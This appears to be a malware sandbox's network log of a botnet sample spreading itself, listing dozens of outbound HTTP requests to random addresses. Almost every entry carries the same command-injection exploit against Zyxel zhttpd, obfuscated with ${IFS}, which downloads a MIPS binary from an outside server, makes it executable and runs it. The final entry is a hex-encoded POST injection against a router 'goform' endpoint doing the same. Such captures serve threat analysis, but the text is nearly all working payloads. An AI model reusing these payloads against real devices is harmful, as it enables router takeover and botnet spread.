                                                  Jan 19, 2024 18:23:48.918132067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2851192.168.2.1335110135.80.31.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918210983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2852192.168.2.1356884125.153.24.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918243885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2853192.168.2.135097084.15.153.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918312073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2854192.168.2.134892649.175.192.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918339014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2855192.168.2.1347850107.122.153.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918373108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2856192.168.2.1348296107.245.185.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918423891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2857192.168.2.1349656168.75.35.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918452024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2858192.168.2.135416249.162.101.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918504000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2859192.168.2.134203432.42.84.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918545008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2860192.168.2.133699453.90.143.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918598890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2861192.168.2.135996095.6.0.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918631077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2862192.168.2.1353964111.217.207.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918659925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2863192.168.2.135343668.57.203.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918709040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2864192.168.2.134413412.100.60.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918760061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2865192.168.2.1350908147.149.226.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918792009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2866192.168.2.1348132197.234.97.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918845892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2867192.168.2.1347312130.230.69.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918889046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2868192.168.2.1349006196.192.218.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918921947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2869192.168.2.135064276.12.121.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918962955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2870192.168.2.1342778107.113.115.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.918991089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2871192.168.2.1345336208.50.91.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919028044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2872192.168.2.133441080.218.43.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919064045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2873192.168.2.134347637.158.91.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919104099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2874192.168.2.133977483.4.36.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919123888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2875192.168.2.135060267.0.171.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919173002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2876192.168.2.13533522.122.66.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919218063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2877192.168.2.133734491.38.251.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919245005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2878192.168.2.135735885.128.120.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919258118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2879192.168.2.1350718149.52.11.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919310093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2880192.168.2.13531608.129.71.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919356108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2881192.168.2.1356448106.3.253.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919392109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2882192.168.2.1354552217.67.134.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919414043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2883192.168.2.1348876211.108.173.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919447899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2884192.168.2.133868831.208.123.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919482946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2885192.168.2.133767278.69.236.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919514894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2886192.168.2.1349270219.26.20.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919548988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2887192.168.2.1343788180.227.243.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919591904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2888192.168.2.135864617.62.40.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.919641972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2889192.168.2.1354664188.153.119.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923407078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2890192.168.2.1348036178.106.251.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923438072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2891192.168.2.134259660.162.172.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923497915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2892192.168.2.134481678.11.147.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923538923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2893192.168.2.1344064218.43.48.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923567057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2894192.168.2.1344546178.22.230.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923599958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2895192.168.2.135918425.174.248.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923655987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2896192.168.2.1336200117.184.9.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923685074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2897192.168.2.1357384199.201.218.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923732042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2898192.168.2.1336164163.87.116.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923778057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2899192.168.2.134194847.27.4.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923815012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2900192.168.2.134709480.79.82.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923861027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2901192.168.2.134758052.64.1.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923881054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2902192.168.2.135454065.114.198.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923922062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2903192.168.2.1334432186.132.103.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.923969030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2904192.168.2.1349430200.233.71.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924017906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2905192.168.2.1359036173.234.53.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924057007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2906192.168.2.1341928210.151.183.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924108982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2907192.168.2.1344296110.120.175.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924144030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2908192.168.2.134185657.2.72.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924194098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2909192.168.2.1346516216.40.236.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924228907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2910192.168.2.134398658.105.12.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.924274921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2911192.168.2.1345658165.225.39.98080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.894364119 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
